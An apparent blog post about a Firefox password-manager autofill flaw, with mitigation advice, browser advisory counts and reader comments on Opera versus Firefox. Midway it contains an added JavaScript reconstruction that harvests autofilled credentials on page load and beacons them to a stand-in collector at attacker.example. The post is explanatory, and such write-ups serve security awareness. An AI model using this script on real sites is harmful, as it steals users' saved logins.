
Firefox Password Stealer


We’ve shown you how easy it can be to retrieve passwords stored in your browser, provided that someone has access to your computer. Well, that’s not the only way for an attacker to get at the information stored in the Firefox Password Manager. A flaw disclosed late last week lets a web page retrieve some of your stored passwords with a very small amount of JavaScript, and no access to your computer at all.

How does it work? Here’s a quick example of what could happen:

  1. A user visits a site such as their own blog hosted on a popular network (something like Blogger).
  2. They log in, and have Firefox remember their username and password for that site.
  3. They visit someone else’s blog on the same domain, and a username/password form appears on that page. As expected, Firefox autofills both the username and the password so that the user only has to hit Enter to log in.
  4. The page uses a little JavaScript to read the username and password out of the form before the user ever hits Submit, simply by retrieving the values sitting in the text boxes (document.<form>.<field>.value) and sending them wherever the attacker likes.

The flaw only exposes whatever is entered into that form, but Firefox enters the stored username and password automatically for anyone who saved a login for that site. That means your credentials can be surrendered without you ever realizing it.

If you want to try this out yourself, Heise has set up a demo site where you make up a username/password and have Firefox store it. When you then go to the “evil” page, Firefox automatically fills out the form and a popup reveals the username and password you stored.

To avoid this, the advice is to either not store passwords in Firefox or to disable JavaScript. Of course, this is really only an issue on a “network” of sites that share the same domain, because Firefox will not, for example, fill in your bank’s username and password here on CyberNet. So be aware of which passwords you have stored for sites that also host other people’s pages, and you can always set a master password so that Firefox prompts you before it unlocks the saved logins (keep in mind that once the store is unlocked for the session, autofill is silent again).
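The sequence in steps 1 through 4 above, and the same-domain condition just described, as an added example (this is not the Heise demo’s code and not from the original post). It is written so that it runs under Node with a constructed stand-in for the DOM and for the browser’s password store; the origins, field names, sample credentials and collector URL are all assumptions for the demo. In a real browser only the script at the bottom would run, against the real document.

```javascript
// Added example: reconstruction of the autofill-harvesting technique.
// Everything below that names an origin, a field or a URL is an assumption.

// The login-looking form the "evil" page on the shared domain serves.
// The password manager keyed saved logins on the site, not on anything
// secret in the page, so a plausible form is all the attacker needs.
const EVIL_FORM_HTML = `
<form name="login" action="/login">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Log in">
</form>`;

// Minimal stand-in for document.forms as the harvesting script sees it.
function makeDocument() {
  return {
    forms: {
      login: { elements: { username: { value: '' }, password: { value: '' } } },
    },
  };
}

// Simplified model of the password manager: saved logins keyed by origin.
// (Real Firefox also compared the form's action host; simplified here.)
// Returns true when it filled the form, which is step 3 in the post.
function autofill(store, origin, doc) {
  const saved = store[origin];
  if (!saved) return false;                      // nothing saved for this site
  const form = doc.forms.login;
  form.elements.username.value = saved.username;
  form.elements.password.value = saved.password;
  return true;
}

// Step 4: read document.<form>.<field>.value; no Submit is involved.
function harvestAutofilled(doc) {
  const form = doc.forms.login;
  if (!form) return null;
  const username = form.elements.username.value;
  const password = form.elements.password.value;
  if (!username && !password) return null;       // browser filled nothing in
  return { username, password };
}

// Exfiltration: an image-beacon URL to the attacker's collector (assumed URL).
function beaconUrl(creds, collector) {
  const qs = new URLSearchParams({ u: creds.username, p: creds.password });
  return `${collector}?${qs.toString()}`;
}

// One page view end to end: the beacon URL that would be requested,
// or null when the browser had nothing to fill in for this origin.
function simulateVisit(store, origin, collector) {
  const doc = makeDocument();
  autofill(store, origin, doc);
  const creds = harvestAutofilled(doc);
  return creds ? beaconUrl(creds, collector) : null;
}

// What the evil page itself would run in a real browser instead of
// simulateVisit(): autofill can land after 'load', so poll briefly.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  window.addEventListener('load', () => {
    const timer = setInterval(() => {
      const creds = harvestAutofilled(document);
      if (creds) {
        clearInterval(timer);
        new Image().src = beaconUrl(creds, 'https://attacker.example/collect');
      }
    }, 250);
  });
}

// Constructed password store: the victim saved a login on the blog network
// and a different one at their bank.
const STORE = {
  'https://blogs.example': { username: 'alice', password: 'hunter2' },
  'https://bank.example':  { username: 'alice', password: 'S3cret!' },
};
```

Running simulateVisit(STORE, 'https://blogs.example', ...) yields a beacon carrying the blog credentials, while the same evil page hosted on an origin with no saved login yields null, and the bank credentials never appear in either: that is the same-domain limitation the post describes, and also why the Secure Login approach (no automatic fill) defeats the harvest.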

An alternative that xpgeek pointed out in the forum is to install the Secure Login extension, which stops Firefox from automatically filling in password forms.

Note: This vulnerability also affects the Safari browser.

– What’s the Most Secure Browser? –

I decided to look up on Secunia, which tracks vulnerabilities for more than 14,000 applications, which browser is currently the most secure. Here’s what I came up with:

  • Opera 9.x has had 8 advisories, all of which have been patched. [source]
  • Firefox 2.0.x has had 13 advisories, and there are 6 that have not been patched. [source]
  • Internet Explorer 7.x has had 14 advisories, and there are 8 that have not been patched. [source]

You can take that information for what it’s worth, but it goes to show that most browsers constantly have security-related flaws.

Source: Heise Security [via Slashdot]


Tags: Firefox, Freeware, Software

12 Comments

  1.

    I use the Secure Login extension
    https://addons.mozilla.org/en-US/firefox/addon/4429

    works like Opera’s wand so it doesn’t autofill the username/password.

    Should also prevent the vulnerability above.

    /edit

    Oh, I see it’s already been mentioned. Nevermind then :D

  2.

    It never ceases to amaze me how unwarranted Opera’s lack of popularity is. I just realized I can move around buttons everywhere in Opera. Even on the sidebar! I love the flexibility! I would need an ext or theme for these configurations in Fx, and I’d never find one just the way I want it.

  3.
    netster007x wrote:
    It never ceases to amaze me how unwarranted Opera’s lack of popularity is. I just realized I can move around buttons everywhere in Opera. Even on the sidebar! I love the flexibility! I would need an ext or theme for these configurations in Fx, and I’d never find one just the way I want it.

    I take it that you’ve been enjoying yourself with Opera then? :)

  4.

    They should just implement the Secure Login extension into Firefox 3 since it seems to solve the problem so completely.

  5.

    Thanks for the heads up. Firefox is my browser of choice so I’ll be checking out that secure login extension.

  6.
    Ryan wrote:
    netster007x wrote:
    It never ceases to amaze me how unwarranted Opera’s lack of popularity is. I just realized I can move around buttons everywhere in Opera. Even on the sidebar! I love the flexibility! I would need an ext or theme for these configurations in Fx, and I’d never find one just the way I want it.

    I take it that you’ve been enjoying yourself with Opera then? :)

    I love the tab bin. Also, I thought Opera would be really stiff with menus. It’s the opposite. I can move any button anywhere I want! In the menu-bar, sidebar, status bar, etc! Not to mention the bittorrent is far better than the 2 ext’s I tried in Fx.

    There are so many useful Opera features, and I don’t have to justify each one like w/ Fx’s extensions. Most of Opera’s features have been re-created in Fx extensions, but I prefer the real thing over the artificial. The original features in Opera never slow down the browser, or reduce stability. I like real, not artificial. I use sugar not splenda and I use Opera not Fx and ext’s.

    The only thorn in my shoe is Y!MB. What I do now is open it in a JavaScript full-screen window from Fx, so it appears as its own application, not Fx. The only thing is it’s inefficient since I end up running 2 browsers. I’m really pushing for that Y!MB Opera full compatibility. The reason it’s not already fully supported is because people don’t use Opera (why?).

    javascript:(function(){var t=window.open('http://mail.yahoo.com','Y-Mail','width=1016,height=734,screenX=0,screenY=0,resizable=yes');})()

  7.

    I think open source is a wonderful thing, but Firefox’s popularity is slowly making it a target. Opera is the way to go if you are worried about security in my opinion.

  8.

    @netster007x: Check out this post by Opera Watch, which is a great blog and run by an Opera employee by the way:
    http://operawatch.com/news/200.....opera.html

    Those are bookmarklets that you can use to open any page in another browser. The great thing with bookmarklets is that you can drag them onto any toolbar (they don’t have to be stored in your bookmarks).

  9.

    I’ve already got InFF. I found it on that huge buttons list in that Opera wiki. The real problem is having to run 2 browsers simultaneously.

  10.

    Make sure you check out the Opera forum for any issues you might be having as well. They are always a good source of helpful tips…that’s how I got services like Google Docs and Google Calendar to work properly because of a script someone made there.

  11.

    I haven’t looked at FF’s password manager since I discovered Roboform.


  1. Firefox’s password manager exposes your data | Todo Tecnología